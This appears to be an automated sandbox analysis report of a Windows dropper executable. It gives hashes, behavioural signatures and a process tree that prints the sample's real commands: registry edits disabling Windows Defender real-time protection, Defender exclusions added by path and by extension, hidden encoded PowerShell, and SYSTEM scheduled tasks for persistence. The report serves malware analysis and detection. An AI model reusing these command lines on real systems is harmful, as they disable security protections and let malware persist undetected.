Analysis

  • max time kernel
    135s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    02/06/2024, 01:02

General

  • Target

    0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe

  • Size

    7.3MB

  • MD5

    0c9f3e28ab69a267a1fff9fe9ae9f516

  • SHA1

    1cf6dbc3e6e3ee82254a201dc9c87a12f08c1e31

  • SHA256

    0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a

  • SHA512

    dc273d9860b8610b338cbfa0c922b7c4a9f6b68308957d2dea0d2124bd659ec0b04781321be3a3f66bc22d02992d8347c386bcceffe6fe49b58ae295e4154a27

  • SSDEEP

    98304:91OC/3dy4gMqA3Varui/uMoMm1/df1kj+wIL7RyLGLlSjAzfC0SitAnoVB28nXNP:91OCPjobQ/R7we7E3uSvn7e9dkzrrza

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 15 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 26 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe
    "C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2648
    • C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2884
      • C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe
        .\Install.exe /KZqjdidXaW "385121" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2544
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2576
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2704
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2368
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:2624
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2604
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2608
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                    PID:2524
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                5⤵
                  PID:3060
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    6⤵
                      PID:2548
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                        7⤵
                          PID:2592
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                      5⤵
                        PID:2676
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                          6⤵
                            PID:2620
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                              7⤵
                                PID:2384
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                            5⤵
                              PID:2976
                              • C:\Windows\SysWOW64\cmd.exe
                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                6⤵
                                  PID:2528
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                    7⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Drops file in System32 directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2536
                                    • C:\Windows\SysWOW64\gpupdate.exe
                                      "C:\Windows\system32\gpupdate.exe" /force
                                      8⤵
                                        PID:2424
                              • C:\Windows\SysWOW64\forfiles.exe
                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                4⤵
                                  PID:2340
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                    5⤵
                                      PID:1924
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                        6⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in System32 directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1816
                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                          7⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2588
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 01:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exe\" PP /NvFdidEBmy 385121 /S" /V1 /F
                                    4⤵
                                    • Drops file in Windows directory
                                    • Creates scheduled task(s)
                                    PID:1976
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"
                                    4⤵
                                      PID:1928
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C schtasks /run /I /tn btZaCbGShXZoJDfvCg
                                        5⤵
                                          PID:1948
                                          • \??\c:\windows\SysWOW64\schtasks.exe
                                            schtasks /run /I /tn btZaCbGShXZoJDfvCg
                                            6⤵
                                              PID:1080
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 604
                                          4⤵
                                          • Program crash
                                          PID:2604
                                  • C:\Windows\system32\taskeng.exe
                                    taskeng.exe {6CFBFD9D-0CBB-4AF8-BC87-646F11C8566F} S-1-5-18:NT AUTHORITY\System:Service:
                                    1⤵
                                      PID:804
                                      • C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exe
                                        C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exe PP /NvFdidEBmy 385121 /S
                                        2⤵
                                        • Executes dropped EXE
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        PID:2272
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                          3⤵
                                            PID:876
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                              4⤵
                                                PID:1332
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                  5⤵
                                                    PID:2248
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                      6⤵
                                                        PID:1992
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                    4⤵
                                                      PID:936
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                        5⤵
                                                          PID:2076
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                            6⤵
                                                              PID:2224
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                          4⤵
                                                            PID:2088
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                              5⤵
                                                                PID:2220
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                  6⤵
                                                                    PID:1208
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                4⤵
                                                                  PID:2228
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                    5⤵
                                                                      PID:472
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                        6⤵
                                                                          PID:2720
                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                      4⤵
                                                                        PID:584
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                          5⤵
                                                                            PID:516
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                              6⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Drops file in System32 directory
                                                                              • Modifies data under HKEY_USERS
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:268
                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                7⤵
                                                                                  PID:2244
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gHrmjaccM" /SC once /ST 00:36:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          3⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:2916
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gHrmjaccM"
                                                                          3⤵
                                                                            PID:1964
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gHrmjaccM"
                                                                            3⤵
                                                                              PID:1824
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                              3⤵
                                                                                PID:880
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                  4⤵
                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                  PID:2004
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                3⤵
                                                                                  PID:1140
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                    4⤵
                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                    PID:1600
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /CREATE /TN "gxkbdyaVa" /SC once /ST 00:20:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                  3⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:2856
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /run /I /tn "gxkbdyaVa"
                                                                                  3⤵
                                                                                    PID:3012
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /DELETE /F /TN "gxkbdyaVa"
                                                                                    3⤵
                                                                                      PID:2324
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                      3⤵
                                                                                        PID:2532
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                          4⤵
                                                                                            PID:2488
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                              5⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Drops file in System32 directory
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2580
                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                6⤵
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2792
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:2664
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                              4⤵
                                                                                              • Windows security bypass
                                                                                              PID:1620
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:1632
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                                4⤵
                                                                                                • Windows security bypass
                                                                                                PID:1816
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:2140
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                                  4⤵
                                                                                                    PID:2312
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                    PID:1568
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                                      4⤵
                                                                                                        PID:2412
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /C copy nul "C:\Windows\Temp\QqEAMUespgTHJnVz\GQDRcsXT\PMxFzlNWEeKxTYtk.wsf"
                                                                                                      3⤵
                                                                                                        PID:2784
                                                                                                      • C:\Windows\SysWOW64\wscript.exe
                                                                                                        wscript "C:\Windows\Temp\QqEAMUespgTHJnVz\GQDRcsXT\PMxFzlNWEeKxTYtk.wsf"
                                                                                                        3⤵
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:948
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1652
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:540
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2092
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2248
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2096
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2724
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2156
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2200
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:516
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1488
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:3052
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1788
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1964
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:700
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1084
